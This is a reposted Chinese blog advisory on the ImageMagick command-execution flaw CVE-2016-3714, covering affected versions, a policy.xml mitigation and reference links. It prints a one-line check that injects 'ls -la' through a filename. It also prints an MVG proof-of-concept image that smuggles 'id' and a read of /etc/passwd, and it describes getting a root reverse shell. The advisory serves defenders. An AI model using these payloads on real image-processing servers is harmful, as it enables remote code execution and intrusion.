ImageMagick爆高危命令执行漏洞
来源:互联网 发布:淘宝代销图片怎么编辑 编辑:程序博客网 时间:2024/05/16 06:37
ImageMagick爆高危命令执行漏洞
0x01 前言
ImageMagick是一套功能强大、稳定而且开源的工具集和开发包,可以用来读、写和处理超过89种基本格式的图片文件,包括流行的TIFF、JPEG、GIF、PNG、PDF以及PhotoCD等格式。众多的网站平台都是用他渲染处理图片。可惜在3号时被公开了一些列漏洞,其中一个漏洞可导致远程执行代码(RCE),如果你处理用户提交的图片。该漏洞是针对在野外使用此漏洞。许多图像处理插件依赖于ImageMagick库,包括但不限于PHP的imagick,Ruby的rmagick和paperclip,以及NodeJS的ImageMagick等。产生原因是因为字符过滤不严谨所导致的执行代码.对于文件名传递给后端的命令过滤不足,导致允许多种文件格式转换过程中远程执行代码。
0x02 影响版本范围
ImageMagick 6.5.7-8 2012-08-17(手工测试风险存在)ImageMagick 6.7.7-10 2014-03-06(手工测试风险存在)
低版本至6.9.3-9released 2016-04-30
0x03漏洞验证
1 命令验证
若系统中安装使用了ImageMagick,本地执行如下命令:convert ‘https://example.com”|ls “-la’ out.png
若ls -la 命令成功执行,说明存在漏洞。未执行ls 命令,并报错,说明不受影响。
2 POC验证
先构建一个精心准备的图片:vi exp1.jpg
pushgraphic-context
viewbox 0 0 640480
fill'url(https://"|id && ls -al /etc/passwd")'
popgraphic-context
执行攻击POC1,虽然有报错,但是两条命令都成功绕出执行了,
就说明漏洞是存在的
那么在制作一个远程下载反弹shell脚本,并且执行shell命令:
执行成功,上接受服务器看去:
Root权限的反弹shell就这样上来了.
0x04修复方案
目前官方的最新修复补丁版本还未能出来,所以暂时建议做以下两种预防策略:1. 在上传图片时需要通过文件内容来判断用户上传的是否为真实图片类型.
2.使用策略配置文件来禁用ImageMagick的有风险的编码器
对于ImageMagick全局策略配置文件在/etc/ImageMagick下对policy.xml最后一行进行增加下列配置:
vi/etc/ImageMagick/policy.xml
<policymap>
<policy domain="coder"rights="none" pattern="EPHEMERAL" />
<policy domain="coder"rights="none" pattern="URL" />
<policy domain="coder"rights="none" pattern="HTTPS" />
<policy domain="coder"rights="none" pattern="MVG" />
<policy domain="coder"rights="none" pattern="MSL" />
</policymap>
在去执行攻击POC2看看,无法执行下载动作和执行命令了.
0x05 参考来源
https://imagetragick.com/http://php.net/manual/zh/function.getimagesize.php
https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2016-3714
https://security-tracker.debian.org/tracker/CVE-2016-3714
0 0
- ImageMagick爆高危命令执行漏洞
- ImageMagick被爆高危漏洞
- ImageMagick 命令执行漏洞
- 使用Coverity 检测 ImageMagick高危命令执行 (CVE-2016-3714 )0Day漏洞
- Struts2爆高危漏洞
- 【高危漏洞预警】CVE-2017-9805:Struts2 REST插件远程执行命令漏洞(S2-052)
- Fastjson 爆出远程代码执行高危漏洞
- 关于Apache Struts2 新增远程命令执行高危漏洞的情况通报
- 开心网某站存在远程命令执行漏洞涉及项目源码(ImageMagick补丁绕过)
- 体验ImageMagick 命令执行漏洞(CVE-2016–3714)的PoC
- ImageMagick命令执行漏洞(CVE-2016–3714)利用及测试
- ImageMagick远程代码执行漏洞分析
- ImageMagick popen_utf8 命令注入漏洞分析报告
- Struts2爆高危漏洞殃及大量网站
- Apache Struts2再爆高危漏洞
- Zabbix爆高危漏洞CVE-2017-2824
- Struts2/WebWork高危漏洞(远程执行任意代码)
- Struts2爆高危漏洞 多行业成漏洞重灾区
- uva 116 Unidirectional TSP
- 【项目源码】- 【模仿知乎日报】模仿知乎日报
- shop++ 4.0系统 一对多,多对一 ,多对多关系配置(个人心得和一些见解)
- namespace 的使用
- js运动原理
- ImageMagick爆高危命令执行漏洞
- bzoj3223 文艺平衡树 treap
- shop++ JPA 注解详解
- markdown编译器
- 如何正确使用开源项目?
- 排序算法
- 机器学习实践指南(三)—— 算法的调试
- [剑指offer]数组中只出现一次的数字
- 从网络获取数据(2)使用SyncAdapter